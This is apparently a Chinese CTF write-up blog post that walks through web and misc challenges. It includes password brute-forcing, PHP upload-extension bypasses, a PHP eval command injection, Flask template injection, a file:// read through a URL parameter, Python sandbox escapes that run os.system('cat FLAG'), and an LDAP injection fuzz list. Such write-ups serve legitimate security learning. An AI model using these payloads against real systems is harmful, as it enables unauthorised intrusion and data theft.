J0k3r

CTFs.18.9

2018-09-26

​​​

123

源码提示

1
2
<!-- 用户信息都在user.php里 -->
<!-- 用户默认默认密码为用户名+出生日期 例如:zhangwei1999 -->

user.php空白,user.php.bak内容含很多用户名,可用来爆破,扫描得到的flag.php并没有flag

选burp的attack type为pitchfork,set两个payload爆破
得到用户和密码

ks1.png

源码提示:

1
2
3
4
5
<!-- 存在漏洞需要去掉  -->
<!-- <form action="" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" name="submit" value="上传" />
</form> -->

去掉注释,补上action,上传文件

phmtl后缀绕过

得到:
<a href="/view.php">view</a>

view.php提示file,传入file参数又提示filter “flag”,过滤了flag

双写绕过

http://9df2aa756fb048e7b0df80c187e5d350b037754437604bc6.game.ichunqiu.com/view.php?file=flflagag

flag{d0b2de22-fe4d-48ee-a447-f010dc83c087}

https://shrimphp.herokuapp.com/?%F0%9F%8D%A4=%22.system(ls).%22

1
2
3
4
5
6
7
8
9
10
<?php
// flag{thisisnotflag}
highlight_file(__FILE__);
$_ = $_GET['🍤'];
//$_ = '".system(ls)."';
if( strpos($_, '"') || strpos($_, "'") || strpos($_, "_") || strpos($_, "[") || strpos($_, "$") )
die('What did you do?????');

eval('die("' . substr($_, 0, 16) . '");');
echo 'Try harder!!!!';

?🍤=".system(ls)."

flag{php_is_good_for_hackers!!!!}

Web Book

link to Web_BooK:http://34.216.132.109:8083/fp/

只能不停点击next,用脚本模拟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#coding: utf-8
import requests
import re

url = 'http://34.216.132.109:8083'
get = '/fp/'
s = requests.Session()

while 1:
r = s.get(url+get)
h = r.text
if 'flag' in h:
print h
exit
get = re.findall('<form action="(.*?)" method="get">',h)[0]
print '[*] try '+get

最终得到flag

ks2.png

Shrine

题目给出源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import flask
import os


app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
app.run(debug=True)

flag是一个特定的配置值,/shrine/后面存在模版注入,过滤了(),添加了黑名单,无法通过来读取配置值,也不能用获取对象的属性值

然后通过拜读wp知道,为了获得配置信息,需要从它的上全局变量(current_app等)访问config。

示例:

1
2
3
__globals__['current_app'].config['FLAG']

top.app.config['FLAG']

所有的函数都会有一个globals属性,它会以一个dict,返回函数所在模块命名空间中的所有变量

一些方法:

  1. url_for函数

找到current_app

读取flag

  1. get_flashed_messages函数

找到current_app

读取flag

  1. request

noxCTF

Reference

What is your reference again?

http://chal.noxale.com:5000

页面显示where the ** did you come from?,根据题意要添加Referer头

根据index.js

1
2
3
4
5
6
7
8
9
10
11
12
$( document ).ready(function() {
$.ajax({
url: "check_from_google",
data: NaN,
success: function(result) {
$("#status").html("hello old friend! " + atob(result))
},
dataType: NaN
}).fail(function() {
$("#status").html("where the **** did you come from?")
});
});

ks3.png

应该在http://chal.noxale.com:5000/check_from_google判断是否来自google

curl -H "Referer: https://www.google.com/" http://chal.noxale.com:5000/check_from_google

得到base64,解码得到flag

noxCTF{G0ogL3_1s_4lW4Ys_Ur_b3ST_R3f3r3nc3}

MyFileUploader

This is my new file uploader server. I bet you can’t hack it!

http://chal.noxale.com:8079

开始是文件上传,抓包

发现总会删除最后的.php,且必须包含.jpg等图片后缀,于是用.jpg.php.php成功上传

ks5.png

index.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<html>
<head>
<title>My file uploading website!</title>
<meta name = "viewport" content = "width = device-width, initial-scale = 1">
<link rel = "stylesheet"
href = "https://fonts.googleapis.com/icon?family=Material+Icons">
<link rel = "stylesheet"
href = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css">
<script type = "text/javascript"
src = "https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script src = "https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js">
</script>
</head>

<body class = "container">
<h5> It is the most secure uploading server in the world! <br></h5>
<div class = "row">
<form enctype="multipart/form-data" class = "col s6 push-s3" method="POST" action=''>
<div class = "row">
<div class = "file-field input-field">
<div class = "btn">
<span>Browse</span>
<input type = "file" name="upload"/>
</div>

<div class = "file-path-wrapper">
<input class = "file-path validate" type = "text"
placeholder = "Upload file" />

<button class="btn waves-effect waves-light" type="submit" name="action">Submit
<i class="material-icons right">send</i>
</button>

</div>

<p style="text-align:center" class="col push-s3">
<?php

if(isset($_POST['action']))
{
if($_FILES["upload"]["error"] != 0) die("Problem occured with file upload");
$target_path = "uploads";
$file_name = $_FILES["upload"]['name'];
$file_type = $_FILES["upload"]['type'];
$file_name = preg_replace("/(\.php$|\.html$)/i", "", $file_name);

echo "File: " . $file_name . "<br>";
if(preg_match("/(.jpg|.png|.gif)/i", $file_name))
{
move_uploaded_file($_FILES['upload']['tmp_name'], "{$target_path}/{$file_name}");
echo "Image uploaded to: <a href='{$target_path}/{$file_name}'>Here</a> <br>";
}
else
{
echo "There is no .png/.jpg/.gif in that file name";
}
}
?>
</p>
</div>
</div>
</form>
</div>
</body>
</html>

不过菜刀连接返回500,直接传一个执行命令的php,却怎么也找不到flag在哪,uploads目录下可能含flag的文件,7H3-FL4G-1S-H3r3,flag.txt等无权限访问,应该是做了权限处理

../.htaccess文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Options +Indexes
AddType application/x-httpd-php .cyb3r

<files flag.txt>
order allow,deny
deny from allow
</files>
<files "Dockerfile">
Order deny,allow
Deny from all
</files>
<files "apache2.conf">
Order deny,allow
Deny from all
</files>
<files ".htaccess">
Order deny,allow
Deny from all
</files>

IndexIgnore *php *pht *txt *png *jpg *gif *cyb3r *php* *Cyb3r

然后不知道怎么办了,在uploads下弄了个.htaccess,然后访问uploads就Internal Server Error,可能被我弄坏了吧

过了几个小时又好了,应该是管理员重置了题目,这次uploads下文件较少,flag应该就在7H3-FL4G-1S-H3r3里,但仍don’t have permission to access /uploads/7H3-FL4G-1S-H3r3

最后ls -l查看权限时出了flag

ks6.png

Marcode

Marcode (Mr. Code in Hebrew), Ineed your help!
I got a movie but I cant see it. It hypnotizes me.
please help me!
yours,
Gveretcode (Mrs. Code in Hebrew)

P.S.
change NOXCTF to noxCTF.
https://drive.google.com/open?id=1GkalBntU1s6d_sw_S5I4GinD8hBrh-C-

这是个很有意思的题

先通过url下载得到一个mp4,打开后不断切换着二维码,根本没法扫

ks7.png

长达两分多钟,得用脚本了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#coding: utf-8

import cv2

videoCapture = cv2.VideoCapture()
videoCapture.open('/Users/xc/Downloads/Marcode.mp4')

fps = videoCapture.get(cv2.CAP_PROP_FPS)
frames = videoCapture.get(cv2.CAP_PROP_FRAME_COUNT)
#fps是帧率,意思是每一秒刷新图片的数量,frames是一整段视频中总的图片数量。
print("fps=",fps,"frames=",frames)

for i in range(int(frames)):
ret,frame = videoCapture.read()
cv2.imwrite("./Marcode-jpg/mp4-(%d).jpg"%i,frame)

把视频中的每一帧都存为jpg,跑完得到3490个jpg,每一个二维码扫完都会得到一个google云盘url,访问能看到仅含一个字符的小图片

再用脚本把每一个jpg都扫一遍,大部分url是重复的,最终得到28个不同的url

ks8.png

等于每个url表示一个字符,又用脚本做了url对应字符的字典,再跑一遍jpg得到一篇文章,是Harry Potter的Chapter 1 The Dark Lord Ascending

搜原文,处理下再burp compare,应该就能得到flag了

ks9.png

弄什么harry potter,原文都不一样,眼都看瞎了,最终找不同得到

1
n o x ctf a into-with v impaosing-impressive d a was-were k e d a toward-towards inward-inwards v wall-walls r  upward -upwards a

不知flag到底怎么写,比赛结束看到wp,flag竟是noxCTF{AVADAKEDAVRA}

扫描的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#coding: utf-8
from PIL import Image
from pyzbar.pyzbar import decode

urllist = []
picdict = {}
pdic = {'https://drive.google.com/open?id=131OPuwNVggs0ZAsVie4dfA3k9zLWN-uu': 'T', 'https://drive.google.com/open?id=1c-go7QIZb_yqGDsRKlXG1j1Py7-wcSFG': 'H', 'https://drive.google.com/open?id=1upmw0QvLjzp6b7RjCrjJGjYfRijF82-g': 'E', 'https://drive.google.com/open?id=1vHlCNodJ84iw51C8gIz4hr0UpsWNx3fm': '_', 'https://drive.google.com/open?id=1mZivmNZ8uDiUb5YUoF8sj9kZXKkh7GNO': 'W', 'https://drive.google.com/open?id=1pXSHKhMzuKrUMg0x8ygZ36yTn0-9nBe8': 'O', 'https://drive.google.com/open?id=1b5wz-LsIBxnA7mp5ImbNLZQY0nob94OO': 'M', 'https://drive.google.com/open?id=1cZlhiRoZcEiaNEwScBQd0IA2PXh1Z1tX': 'N', 'https://drive.google.com/open?id=1OqacmR-Ccc2YLVYCS2co4dWtSqfEGxIl': 'A', 'https://drive.google.com/open?id=1DF2RneUWAb6wqp7YJ0vjOwDJGdENEc0Q': 'P', 'https://drive.google.com/open?id=1lKeCjQFcTSuUzMGUEeEzPj4d2x1MLTJm': 'R', 'https://drive.google.com/open?id=1JtDxAfX8AEC_mFzJPZofI1RyOL62MAmk': 'D', 'https://drive.google.com/open?id=1hjIQq2fEcduFF0CfRs-MJ2hlCuC5lkW6': 'U', 'https://drive.google.com/open?id=1rHGDe2F5vLws9fA0M3L9IELX9LYaU50x': 'F', 'https://drive.google.com/open?id=1p4m9gtvh31s2SJ9G1uNr8burIvQabm_k': '?', 'https://drive.google.com/open?id=1g2I1a09lO4m0imhIzJ60LUeDPNDIdIp_': 'Y', 'https://drive.google.com/open?id=1lSanpoEq3LeV0aaL6KEnUiJE2iGijdrt': 'S', 'https://drive.google.com/open?id=1Rw-Op049iTliLPFTTRj7p4gBXmm8IboN': 'I', 'https://drive.google.com/open?id=1H5DHyv0METKfLV7xdzw-SVXU_F1o1iKM': 'L', 'https://drive.google.com/open?id=1GLtL-X1IS4ms6fwC2OQV4jAmXjI_6bjQ': 'C', 'https://drive.google.com/open?id=1vPBtiNzUzYEOEKFK60vG305uPw9CDy8p': 'Q', 'https://drive.google.com/open?id=1DV0ACuyKWsFm2ApXgHHDP_DSzwqmtt5M': 'G', 'https://drive.google.com/open?id=1nlp-HIwnRbG61mf5SF_BzMdlNAR7tHLt': 'Z', 'https://drive.google.com/open?id=151y0xa6hnTR9yp9G0D-dyox08bV4-JZX': 'B', 'https://drive.google.com/open?id=1dtYor_A9Sf3DDTlczTLA0s9rBluVNoOX': 'K', 'https://drive.google.com/open?id=1UpU1_MTK-0XgCpcZKC4AVGsBswNpQTBO': 'X', 'https://drive.google.com/open?id=1apKMrqUwZn5dOkRWfjbYgYH_RvkmPD2P': 'V', 'https://drive.google.com/open?id=1uynnoN7ItBRls7MiqFa1rLE-W3o9CnY5': 'J'}
sum = 0
code = []
codes = "THE_WOMNAPRDUF?YSILCQGZBKXVJ"
string = ''
for ac in codes:
code.append(ac)
'''print (code)'''
for i in range(0,3490):
name = "mp4-("+str(i)+").jpg"
decode_result = decode(Image.open(name))
url = str(decode_result[0].data, encoding='utf-8')
string = string + pdic[url]
print (string)
'''
if url not in urllist:
picdict[url] = code[sum]
sum = sum + 1
urllist.append(url)
#print ('[+] '+name+' :'+url)
'''
#print ("totla is "+str(sum))
#print (picdict)
print (string)

以下是看wp后的记录

hiddenDOM

I decided to create a tool that searches for
hidden elements inside a web pages.
Few days ago someone told me that my website is not so /secure/…
Can you check it yourself ?

http://13.59.2.198:5588

解码之后的一段js

1
2
3
4
5
6
7
8
9
10
11
var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
$(_0x2b80[4])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
});
});
$(document)[_0x2b80[5]](function() {
$(_0x2b80[7])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
});
});

起作用就是创建

1
2
<form id="main_form" action="index.php" style="position:sticky;">
<input name="expression" placeholder="/<[^<>]{1,}hidden[^<>]{1,}>/" type="text">

相比之前还要输入一个expression

输入源码里<a href='/var/www/html/flag.txt' hidden >-_-</a><p style='color:red;'></p>中的路径后得到另一段js,不过没用

满足expression的正则,file读取文件

?target=file:///var/www/html/flag.txt&expression=/.*/

Python for fun - Misc

http://chal.noxale.com:8000/

传递两个被解释的参数进行注入

ks10.png

a,b=print(exec("import os"),eval("os.listdir('.')"))

a,b=print(open("FLAG", "r").read())

Python for fun 2

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("cat FLAG")

LDAP injection

http://web.chal.csaw.io:8080/index.php?search=

LDAP注入是一种攻击,用于利用基于web的应用程序,这些应用程序基于用户输入构建LDAP语句。当应用程序无法正确清理用户输入时,可以使用本地代理修改LDAP语句。这可能会导致执行任意命令,例如授予未授权查询的权限,以及在LDAP树内修改内容。SQL注入中可用的相同高级开发技术可以类似地应用于LDAP注入中。

服务查询类似:
(&(GivenName=<INPUT>)(!(GivenName=Flag)))

利用*)(uid=*))(|(uid=*绕过

完整语句:
(&(GivenName=*)(uid=*))(|(uid=*)(!(GivenName=Flag)))

查询语法:
http://www.361way.com/ldap-query-grammar/2542.html

fuzz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*

hackitctf

ge going

https://ctf.hackit.ua/w31c0m3

这是个比较新的隐写思路,相关内容比较少

零宽度字符是隐藏不显示的,也是不可打印的,也就是说这种字符用大多数程序或编辑器是看不到的。

相关文章:

在题目这句W‏‍‏‌‎‎‏‍‏‎‏‏‎‏‎‏‍‌‎‏‏‎‏‍‏‍‌‍‌‍‌‎‏‏‏‍‍‎‏‏‏‌‍‍‌‏‍‏‏‏‍‎‏‏‎‏‌‏‏‏‎‌‏‏‎‏‏‎‍‏‍‌‏‏‎‏‏‌‏‎‏‍‌‌elcome to the HackIT 2018 CTF, flag is somewhere here. ¯_(ツ)_/¯的W和e之间就隐藏着如下零宽度字符

1
&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwnj;&lrm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&rlm;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwj;&zwnj;&#8203;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&zwnj;&zwj;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&zwnj;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&rlm;&lrm;&zwj;&#8203;&#8203;&#8203;&#8203;&rlm;&zwj;&#8203;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&lrm;&rlm;&rlm;&#8203;&#8203;&#8203;&#8203;&zwnj;&rlm;&lrm;&#8203;&#8203;&#8203;&#8203;&rlm;&#8203;&#8203;&#8203;&#8203;&#8203;&#8203;&zwj;&#8203;&zwnj;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;

&zwnj;

它叫零宽不连字,全称是Zero Width Non Joiner,简称“ZWNJ”,是一个不打印字符,放在电子文本的两个字符之间,抑制本来会发生的连字,而是以这两个字符原本的字形来绘制。Unicode中的零宽不连字字符映射为“”(zero width non-joiner,U+200C),HTML字符值引用为: ‌

&zwj;

它叫零宽连字,全称是Zero Width Joiner,简称“ZWJ”,是一个不打印字符,放在某些需要复杂排版语言(如阿拉伯语、印地语)的两个字符之间,使得这两个本不会发生连字的字符产生了连字效果。零宽连字符的Unicode码位是U+200D (HTML: ‍ ‍)。

&lrm;

左至右符号(Left-to-right mark,LRM)是一种控制字符,或者说是不可见的排版符号。左至右符号的统一码字符是U+200E,亦可在HTML中表现为‎ ‎或者‎, UTF-8中则是E2 80 8E。

&rlm;

右至左符号(Right-to-left mark,RLM)是一种控制字符,用于计算机的双向文稿排版中。右至左符号的Unicode字符是U+200F,亦可在HTML中表现为‏ ‏或者‏

&#8203;

零宽空格(zero-width space, ZWSP)是一种不可打印的Unicode字符,用于可能需要换行处。在Unicode中,该字符为U+200B“”零宽空格 ,HTML:​。

这里的零宽度字符可用https://github.com/offdev/zwsp-steg-js解密

de.js内容为

ks11.png

运行获取flag

ks12.png

Tags: wp
使用支付宝打赏
使用微信打赏

若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏

扫描二维码,分享此文章